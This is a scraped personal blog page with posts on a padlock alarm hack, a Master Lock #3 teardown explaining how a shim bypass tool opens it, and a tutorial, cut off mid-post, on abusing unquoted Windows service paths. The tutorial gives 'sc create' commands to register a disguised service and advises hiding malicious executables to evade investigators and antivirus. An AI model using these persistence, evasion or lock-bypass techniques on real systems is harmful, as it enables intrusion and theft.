I got an old LED, a 9V battery connector, and some electrical tape and rigged myself up a visual alarm that would light the LED when the alarm is triggered.<br />
<br />
Here's the video of me smacking it with a screw driver. Not very elegant, but I couldn't set the thing off by just shaking it in my hand, I had to hit it with something:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dxmZPtvqXdYgpmaoqiRT0Ulw1oxeNP0yrDKbCpHMj5GXIPB2f6WLe-3WepvJ1MR-WOYm9x31yse3ups4PnO1w' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
You actually have to smack it pretty hard, several times, to get it to go off, and it's kind enough to give you a 3 beep warning before it actually goes off. When it does go off it triggers the alarm for 10 seconds, then it automatically resets itself, I assume to save batteries.<br />
<br />
So there you have it.<br />
<br />
I have yet to get intimate with the lock itself but I hope that at least one part of this padlock is worth it's salt. As it stands I wouldn't use this thing to guard anything I considered valuable. I'm fairly certain if you stuck any key in the lock, or a sturdy tension tool, and turned it the pin holding the lock in place would give out and the whole thing would just fall apart.<br />
<br />
I'll update this when I've laid bare the secrets of the lock itself.<br />
<br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7776905799486744720.post-55856308742470910862012-08-21T05:40:00.000-10:002012-08-21T05:55:02.861-10:00Master Lock #3 Padlock teardown and the Peterson Silver Bullet Bypass<div class="separator" style="clear: both; text-align: center;">
</div>
I don't own many bypass tools. To be exact I own two, one of my own making and the Peterson Silver Bullet for Master Lock Padlocks.<br />
I picked up the Silver Bullet at Defcon from the Merch area, it looked deceptively simple from the example lock and demonstration. I just so happened to have a #3 padlock I had brought with me so I bought it.<br />
<br />
I spent the next several days trying to figure out how in the hell to use the damned things. I read the directions a few hundred times, I looked online and all I saw was a lot of videos showing how easy it was and descriptions of "you just slide this one in, press down, then slide the other one in and press down".<br />
<br />
I could not get it to work.<br />
<br />
Furthermore there was nothing online that showed exactly how it worked, what it moved, and what the lock looks like inside.<br />
<br />
So I decided to tear my lock apart and take a look for myself and see exactly what the hell I was supposed to be doing in there.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_t5P0tKFMa0bS1brhWkEaEYfxAj9qvQUQ5HGctduquPcLtkggzhPJrC9CkSJoNfipRChN8NHWpVV7D9Valu3S0CCgM0VET8u9QBszplcrr2soEZXNOYHKNmUgY_GEQRG1jAue4Mtp5Nk/s1600/Face.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_t5P0tKFMa0bS1brhWkEaEYfxAj9qvQUQ5HGctduquPcLtkggzhPJrC9CkSJoNfipRChN8NHWpVV7D9Valu3S0CCgM0VET8u9QBszplcrr2soEZXNOYHKNmUgY_GEQRG1jAue4Mtp5Nk/s1600/Face.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">It's a #3 it got a bit ground off</td></tr>
</tbody></table>
So these here are the bypass tools, one marked A (shorter) and one marked B (longer). I've added a bit of heat shrink as a make shift grip because these are very thin and are hard to hold onto if your fingers are sweaty, also after a few hours of trying to get these to open the lock my fingers were getting sore from the edges of the metal. <br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgjvdMdWKjg0ybKJ1DM3-uI1dn7sYmqB-nPt75gJYSiYkTaqDVWvVN5SrhXLYKSWHWAKEdw26vDZXRhFc4voEr9enpTQTIYTkxBbjbJH3aqIBYysElSOPkJVm-YjKkUBokfUyIg8RuJzs/s1600/Silver+Bullet.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgjvdMdWKjg0ybKJ1DM3-uI1dn7sYmqB-nPt75gJYSiYkTaqDVWvVN5SrhXLYKSWHWAKEdw26vDZXRhFc4voEr9enpTQTIYTkxBbjbJH3aqIBYysElSOPkJVm-YjKkUBokfUyIg8RuJzs/s320/Silver+Bullet.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Peterson Silver Bullet Bypass w/ "custom" grips</td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Here's the lock with the face and the unimportant plates removed. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpK6SLdFglhE2JhgoW2q5923TbOKJQyi614lopAvEfxlBycQIgV2wGF7GMqPPBzEPUyKnSzW8sEWt_v3weIvjNCCyLvreeVwsYH6mCCcawGn3BRj9AQ8HtlegSoVSI5sYEwzw18Zn4gp0/s1600/Exposed_Cylinder.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpK6SLdFglhE2JhgoW2q5923TbOKJQyi614lopAvEfxlBycQIgV2wGF7GMqPPBzEPUyKnSzW8sEWt_v3weIvjNCCyLvreeVwsYH6mCCcawGn3BRj9AQ8HtlegSoVSI5sYEwzw18Zn4gp0/s1600/Exposed_Cylinder.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJJf3ixJMuR8eIAqoUdxEs2HcXSskw8ZGQ4940nPl98FDy3qNsFXA0ezm1dgP84T75NVNYpoAsPSX4CbfTTvMsM902BS0eszwihyphenhyphenKmQR3_WspW9KmJsJsr9BguAQRRWCrVvf2c1kXSMuE/s1600/Cylinder3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
This is what the "unimportant" plates look like. The inside shape is identical on all of them. The ones near the bottom (where you insert the key) of the lock are smaller on the outside to accommodate the blue plastic "Master" wrap the locks have on them.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEpJo2k97BaSZW1zWTY9yPFMhumIdum2dn8HvIZV7EF29_Bh_3H153ZmljmhGi9Il3qwvPcIr9Ix7KocXzDXMqDu-fSV-XSjexGxtso3IM_t0zw-w0wgutgnxnOJFVnQ6JNCuk1RV96A/s1600/Standard_Plate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPEpJo2k97BaSZW1zWTY9yPFMhumIdum2dn8HvIZV7EF29_Bh_3H153ZmljmhGi9Il3qwvPcIr9Ix7KocXzDXMqDu-fSV-XSjexGxtso3IM_t0zw-w0wgutgnxnOJFVnQ6JNCuk1RV96A/s1600/Standard_Plate.jpg" /></a></div>
<br />
This is the lock cylinder. Nothing fancy, just a 4 pin setup with no security pins. The back has a protrusion that when the sheer point is reached and the plug turned interacts with a post that moves the locking plates and releases the shackle.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZqvK03X7y78kR7ypvODmeBHUK7iHe2vMtz5piFJxySECmZ1qnK5ONxeOLB8DXTpndX13ytrYVg5WugQgR-e6qWhtegcXSOOtmIOynUkZ06fhI_YDRFWa-HqdHByFyAN7mczNnX5MHQA/s1600/Cylinder1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZqvK03X7y78kR7ypvODmeBHUK7iHe2vMtz5piFJxySECmZ1qnK5ONxeOLB8DXTpndX13ytrYVg5WugQgR-e6qWhtegcXSOOtmIOynUkZ06fhI_YDRFWa-HqdHByFyAN7mczNnX5MHQA/s200/Cylinder1.jpg" width="129" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj2Qoe3PvmBX-lbkMd-B8RHy1hOqWhyytstu1briIZtbD5pKAeP_koJGiMVQgBD_wYBs_w8TV9Wc6HcFH95zjYKbsjVjyW-EEOvok4uYWJqudUYX5YdpX4AdLOqmdXIoxCl3RZ5VO4QP0/s1600/Cylinder2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj2Qoe3PvmBX-lbkMd-B8RHy1hOqWhyytstu1briIZtbD5pKAeP_koJGiMVQgBD_wYBs_w8TV9Wc6HcFH95zjYKbsjVjyW-EEOvok4uYWJqudUYX5YdpX4AdLOqmdXIoxCl3RZ5VO4QP0/s200/Cylinder2.jpg" width="200" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJJf3ixJMuR8eIAqoUdxEs2HcXSskw8ZGQ4940nPl98FDy3qNsFXA0ezm1dgP84T75NVNYpoAsPSX4CbfTTvMsM902BS0eszwihyphenhyphenKmQR3_WspW9KmJsJsr9BguAQRRWCrVvf2c1kXSMuE/s1600/Cylinder3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJJf3ixJMuR8eIAqoUdxEs2HcXSskw8ZGQ4940nPl98FDy3qNsFXA0ezm1dgP84T75NVNYpoAsPSX4CbfTTvMsM902BS0eszwihyphenhyphenKmQR3_WspW9KmJsJsr9BguAQRRWCrVvf2c1kXSMuE/s200/Cylinder3.jpg" width="141" /></a></div>
<br />
This is the padlock without the plug. Finally I was able to see what was going on in there.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheK95tLk86le-C9iZeEMNGLs8Xfqv8vhFqfeEaDbKzbeW6Ocp5ZfCxLQ4rIheggyj1QOqMyDp3c2VK8t7Lk4hRAMCnZWQhnpc8FgRTUAG36oLU2KOakPd48CU-KBWlTV0GgrT8ZpNGG4U/s1600/Internals.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheK95tLk86le-C9iZeEMNGLs8Xfqv8vhFqfeEaDbKzbeW6Ocp5ZfCxLQ4rIheggyj1QOqMyDp3c2VK8t7Lk4hRAMCnZWQhnpc8FgRTUAG36oLU2KOakPd48CU-KBWlTV0GgrT8ZpNGG4U/s320/Internals.jpg" width="156" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Outlined in Yellow are the locking plates, Red is the post that rotates to move the plates and release the shackle</td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
Here's a larger picture of the internals of the padlock.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3PZjNpbuSstNcL12nP4C31mfhBMInj-otibeBdD-8o-7JZLwkdkZfaCinCWa2oPCr24-n0pJGHNHDprnHJd-7n-yEEwbYO-Tg68unKtQaYoz6pgLholne5QAf2Hz8xIJWTzUzWdO2dI/s1600/Internals-High.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn3PZjNpbuSstNcL12nP4C31mfhBMInj-otibeBdD-8o-7JZLwkdkZfaCinCWa2oPCr24-n0pJGHNHDprnHJd-7n-yEEwbYO-Tg68unKtQaYoz6pgLholne5QAf2Hz8xIJWTzUzWdO2dI/s640/Internals-High.jpg" width="408" /></a></div>
<br />
This is what the locking plates look like<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3av1bcMZDpPzDc5ZH3nJggXsntfVxxLGUUrh0Aob5jqqAcPu3m1wTkbsHmJDbvOZm-HHuC_R0D0UgNfMaTNLszeXAuram4xbU2I9ZgjQYFbwZRRNFGiNaO0G6f-TUu645a9bg9mUxL4M/s1600/Locking_Plate_Single.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3av1bcMZDpPzDc5ZH3nJggXsntfVxxLGUUrh0Aob5jqqAcPu3m1wTkbsHmJDbvOZm-HHuC_R0D0UgNfMaTNLszeXAuram4xbU2I9ZgjQYFbwZRRNFGiNaO0G6f-TUu645a9bg9mUxL4M/s320/Locking_Plate_Single.jpg" width="320" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBxWgUbob6UKoiIUgFeS69Z72f_ZgTG1ps3Y95RdObEydBb-1AQpCGSgGGAQqO92d_zl5oDd25ghi1rW_QKQbtN4nBIEVHNHV6T3uQzWKA_H4WOE0kfSFyRftDfaNYbX15KUIuJWmXKeg/s1600/Locking_Plate_Single2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBxWgUbob6UKoiIUgFeS69Z72f_ZgTG1ps3Y95RdObEydBb-1AQpCGSgGGAQqO92d_zl5oDd25ghi1rW_QKQbtN4nBIEVHNHV6T3uQzWKA_H4WOE0kfSFyRftDfaNYbX15KUIuJWmXKeg/s320/Locking_Plate_Single2.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">You can see the scratches where I've been using the bypass on this one.</td></tr>
</tbody></table>
<br />
So this is how the bypass actually works<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh448eem3DptcoL5hmMiTFzYsNCM1_XKU4S0Im-IxCSUkZ-OABgDWFwxYqEVB5XuBUdCmoPIZXvTzX0-BZppRV7n2tZCOXXoMsQtjxBqMesMUeVwK1p1ZYDcdCeP87GZgQnY4u475a8wX0/s1600/Bypass_Part_A.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh448eem3DptcoL5hmMiTFzYsNCM1_XKU4S0Im-IxCSUkZ-OABgDWFwxYqEVB5XuBUdCmoPIZXvTzX0-BZppRV7n2tZCOXXoMsQtjxBqMesMUeVwK1p1ZYDcdCeP87GZgQnY4u475a8wX0/s640/Bypass_Part_A.jpg" width="376" /></a></div>
This is with the A bypass inserted. Now normally you would slide this in while pressing the pins up in the lock to be able to access this, then you have to find where the locking plate contacts the post and press, it will move out of the way without a lot of pressure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqTbGbPtvnYWau_tLJ6oE2hqJubuvGYHZ_phhbbKcErn4X92gy-h2Jp9QAnTBS56RqMp43Ho0CcyEL7_tezd4WRkJX9CpWJj4ef0YcKRShyphenhyphen_cVQKwa0r_cFFeFwTRLqwe79zVZnkMwdjw/s1600/Full_Bypass.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqTbGbPtvnYWau_tLJ6oE2hqJubuvGYHZ_phhbbKcErn4X92gy-h2Jp9QAnTBS56RqMp43Ho0CcyEL7_tezd4WRkJX9CpWJj4ef0YcKRShyphenhyphen_cVQKwa0r_cFFeFwTRLqwe79zVZnkMwdjw/s640/Full_Bypass.jpg" width="294" /></a></div>
<br />
This is with both A and B bypass tools in their proper position. Bypass B tool has to reach the second locking plate which is about 2 plates further down than the first locking plate. Once the A tool is inserted properly it moves the locking plate which also reduces the opening available to get the B tool into it's proper position.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx7dNnV_Yq-gVPQgGa1b4JBNHLS7F2YYUmgOJ1EtCvi5acjI8moXIIRP4t91P9PK58LDa-4mdz8BF6nmp7qxm0Hy82GKn6R3MTiWx8nk2u9YuM1kmfWCbra0k2IxkMD6Iirm1j4kinUGw/s1600/Full_Bypass_Small.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx7dNnV_Yq-gVPQgGa1b4JBNHLS7F2YYUmgOJ1EtCvi5acjI8moXIIRP4t91P9PK58LDa-4mdz8BF6nmp7qxm0Hy82GKn6R3MTiWx8nk2u9YuM1kmfWCbra0k2IxkMD6Iirm1j4kinUGw/s400/Full_Bypass_Small.jpg" width="133" /></a></div>
<br />
<br />
Here's some more pictures of the locking mechanism and post.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OvDCVEbqwEfCciyU_qhnhlV04KkXRQKvdS9ypL4KrnCDsubDIMd2s6VyRb81prf6VkpH1ZWTnNyJH75TT0KPLg9MQFbf4OUud4mLXfDbegw8f10TCck-vjzWzsDAP-_3ZM6pyOj77wM/s1600/Plug.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OvDCVEbqwEfCciyU_qhnhlV04KkXRQKvdS9ypL4KrnCDsubDIMd2s6VyRb81prf6VkpH1ZWTnNyJH75TT0KPLg9MQFbf4OUud4mLXfDbegw8f10TCck-vjzWzsDAP-_3ZM6pyOj77wM/s1600/Plug.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Post, there is a 3 stamped in the the middle</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4eCMp-RdSGcsl11qpFUt4sbfj_0yBcQVFqe2walOFt5-e_oUdOITLn0k3OYoudy2JIjw0kgnnRn6yb09O8GJrIoWWiHV4Epq7vgnhnzzIQjkJpB899e5z3joATbh-IzXT3RH18TZsXU/s1600/Plug_side.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4eCMp-RdSGcsl11qpFUt4sbfj_0yBcQVFqe2walOFt5-e_oUdOITLn0k3OYoudy2JIjw0kgnnRn6yb09O8GJrIoWWiHV4Epq7vgnhnzzIQjkJpB899e5z3joATbh-IzXT3RH18TZsXU/s1600/Plug_side.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Side View, when turned the sides contact the locking plates and press them against the springs</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9nUpwUT2s4Hbi1jwjyPS9aHRwnSav6RXIO1ppckwkDrPbaplx2H3KV3cd-TPN9LHn9-5-VTpw5FExCo42Zhm04NgUWdbYxq1do6_E7vQj1x6YCdvXjsD79R7wjdugYZfo-w5fc25lad0/s1600/Plug_top.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9nUpwUT2s4Hbi1jwjyPS9aHRwnSav6RXIO1ppckwkDrPbaplx2H3KV3cd-TPN9LHn9-5-VTpw5FExCo42Zhm04NgUWdbYxq1do6_E7vQj1x6YCdvXjsD79R7wjdugYZfo-w5fc25lad0/s1600/Plug_top.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Top, furthest from where key is inserted into the lock.</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wVvCr5cNVvU_kuVUYdeP-1obZPDNoBoNlsG8atBc7i0rdMHprFWzk6P8BuY2i_cQCx3pXMky0hrUv7HCgaOpIrsHbraNgyCSEqLtYL3N-uCsVU-0U6ihIZj4XAI1b_mSu7m_Nj4Ip2o/s1600/Top_Locking+Plate.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wVvCr5cNVvU_kuVUYdeP-1obZPDNoBoNlsG8atBc7i0rdMHprFWzk6P8BuY2i_cQCx3pXMky0hrUv7HCgaOpIrsHbraNgyCSEqLtYL3N-uCsVU-0U6ihIZj4XAI1b_mSu7m_Nj4Ip2o/s320/Top_Locking+Plate.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Lock with Top Plate removed, this is the locking plate that the B tool interacts with</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUK8UKM1MN-iIh_hTVaxsxfpAK8O8fIfYcvyKBsM5qXFUqeRJ3AAWNgu5dUZJZGehkSGVcZzqoM4Svz6iZbj3rZ5SjAOYNQoaR_pSFoR1owPDd8Jf9NZ-JY1L-woBkA3K1k-mMsTqgcQ/s1600/Lower_Lockin_Plate.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbUK8UKM1MN-iIh_hTVaxsxfpAK8O8fIfYcvyKBsM5qXFUqeRJ3AAWNgu5dUZJZGehkSGVcZzqoM4Svz6iZbj3rZ5SjAOYNQoaR_pSFoR1owPDd8Jf9NZ-JY1L-woBkA3K1k-mMsTqgcQ/s320/Lower_Lockin_Plate.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Lock with Top Plates removed, this is the plate the A tool interacts with</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkIWq3LL3vEEZwKw0BsTlW3ksj2I1KvZxXvhFZSF06ozg0-k0oQZYNg3yKuMYbf5t9MGGrt-zQ8p46RHDB_dk6ULKMqlerDMlFLRLi-9uGI4qf1Xo4hrpfPEq1A_AL5A-ZmgVnD7H9lGk/s1600/Stacked_Locking_Plates.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkIWq3LL3vEEZwKw0BsTlW3ksj2I1KvZxXvhFZSF06ozg0-k0oQZYNg3yKuMYbf5t9MGGrt-zQ8p46RHDB_dk6ULKMqlerDMlFLRLi-9uGI4qf1Xo4hrpfPEq1A_AL5A-ZmgVnD7H9lGk/s320/Stacked_Locking_Plates.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Here are the 4 plates that make up the locking mechanism for the shackle</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjzthdEx6xX2dqGRW758Koy85DwNna_4ZShpLLIPxjI4-311p5BdF6YsxZju7xPSI73DmaHDV8DBGtSqhrfiy4t-ZMqZ36UK0us875Vu3x4ZMVjjOreb8mj20A7vCSFH7l9HLulXQvDEU/s1600/Layed_Out_Locking_Plates.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjzthdEx6xX2dqGRW758Koy85DwNna_4ZShpLLIPxjI4-311p5BdF6YsxZju7xPSI73DmaHDV8DBGtSqhrfiy4t-ZMqZ36UK0us875Vu3x4ZMVjjOreb8mj20A7vCSFH7l9HLulXQvDEU/s320/Layed_Out_Locking_Plates.jpg" width="237" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
So that's it. The mystery of how the Silver Bullet Bypass tool actually works is solved.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7776905799486744720.post-46826790503509421012012-08-20T09:08:00.001-10:002012-08-22T05:40:38.026-10:00Hiding Files by Exploiting Spaces in Windows PathsThis is by no means a new thing. I've known about it for a really really long time, as I'm sure a whole lot of other people do, but for some reason no one uses it. Kind of like NTFS file streams, it's neat but not very many people make use of it.<br />
<br />
There was a twitter post about something similar to this the other day and it took me by surprise that not everyone knew about it and that it was being treated as a novel approach.<br />
<br />
Usually everyone talks about this for the exploitation of privilege, I use it to hide the true execution path to files. All of this requires that you have admin like permissions for it to work, this is pretty much worthless to the regular non priv. user.<br />
<br />
So I thought I'd write up a post on it.<br />
<br />
The basic premise is this: If you have a path with a space in it, Windows will break the path and attempt to execute all files with that path name as the file name.<br />
<br />
Example: C:\Program Files\Crappy App\Whatever.exe<br />
<br />
We will assume some program is attempting to start the application at the path above. IF the path is not enclosed in quotes (") it will attempt to run C:\Program.exe, C:\Program.bat, etc and then C:\Program Files\crappy.exe, C:\Program Files\crappy.bat, etc.. THEN if it fails to find any of those it finally launches the intended application.<br />
<br />
OMG we just figured out how to super leet hack the world...<br />
<br />
No not quite.<br />
<br />
A lesser known bit of trivia... Windows will freak the hell out if you have a program named Program.exe in the C: directory. If you restart your computer and that file exists windows will alert you that it exists and instruct you to delete it or delete it automatically I don't remember for sure. This is because the good folks at MS know this is a problem, this is one of the reasons why you don't have file create permission on the C: drive but you do have folder create permission as a generic user. It is fun to make a Program.exe file that just echo's hello and put it in the C: drive and see what applications trigger it though. (I'm looking at you Notepad++)<br />
<br />
Usually when there are spaces in the path those are all places you, as a regular non-priv user, don't have write permissions to. The only time I've seen where this was exploitable from a non privledged user was in some custom in house applications registry keys and some poorly written batch startup scripts with incorrect folder permissions. I've never viewed a service without quotes around the binpath, with spaces in the binpath, and that path is writable by non privileged users. Not saying it doesn't happen but it's fairly rare, from what I've seen.<br />
<br />
But back on track, I'm talking about hiding files, or really just disguising where the files that are actually being executed really are.<br />
<br />
You can use this technique to obfuscate locations in the registry, in services binpath, in batch files, all over the place.<br />
<br />
I prefer to create services rather than registry run keys for nefarious programs that need to stay persistent. Lots of people check the registry occasionally, and nothing screams suspicious like a weird registry key in the run areas.<br />
<br />
When was the last time you did a binpath= check and made sure all the paths were inclosed in quotes? When was the last time you checked all those and then compiled a list of the paths without quotes and with spaces then checked for like named executables in those paths? <br />
<br />
The answer is never. <br />
<br />
So say we use this batch file to create a new service:<br />
<br />
@echo off<br />
sc create "Windows UDP Processor" binpath= "C:\program files\common files\run.exe" start= demand type= own<br />
sc description "Windows UDP Processor" "Manages Windows UDP Routing Traffic"<br />
<br />
*note: I always try to make things look as un-suspicious as possible hence the "sc description" command to add a description to the service. It's the little things kids.<br />
<br />
Since we <u>didn't</u> use escaped quotes in the bin path we end up with a binpath of this:<br />
C:\Program Files\Common Files\Run.exe<br />
Instead of<br />
"C:\Program Files\Common Files\Run.exe"<br />
<br />
(we SHOULD have used this "\"C:\Program files\common files\run.exe"\" as the binpath) <br />
<br />
I've already dumped my malicious file common.exe in C:\Program Files\.<br />
<br />
When this service starts it will run C:\Program Files\common.exe not C:\Program Files\Common Files\Run.exe<br />
<br />
IF the service ever gets examined most likely the person will check Run.exe, see that it's legit / harmless and move on missing the real file that is being executed.<br />
<br />
Pretty sneaky right?<br />
<br />
Well except for the part where you created a new service, that's still kinda sketchy.<br />
But, if you find a legit service with spaces (more than one, usually in C:\Program Files) in the path you can modify the binpath of the service and remove the quotes (that it should have) and then place your file in the path with the proper name. Having your malicious file start the intended executable will belay suspicion. <br />
<br />
There you have it, a legitimate service, pointing to a legitimate executable, but we're jumping in the middle and getting our file executed.<br />
<br />
Then all you have to do is worry about AntiVirus programs going NOM NOM NOM on your files.<br />
<br />
This works for Service BinPaths and Registry Keys, with batch files you have to go about it a little different.<br />
<br />
With Batch files you can't have spaces in the path. End of the story.<br />
<br />
So if you tried to call C:\Program Files\Crappy App\Whatever.exe without quotes, unless there's a C:\Programs.exe it's going to fail with a file not found.<br />
So you have to use the short path name for everything up to where you want it to break and execute the file.<br />
Like this:<br />
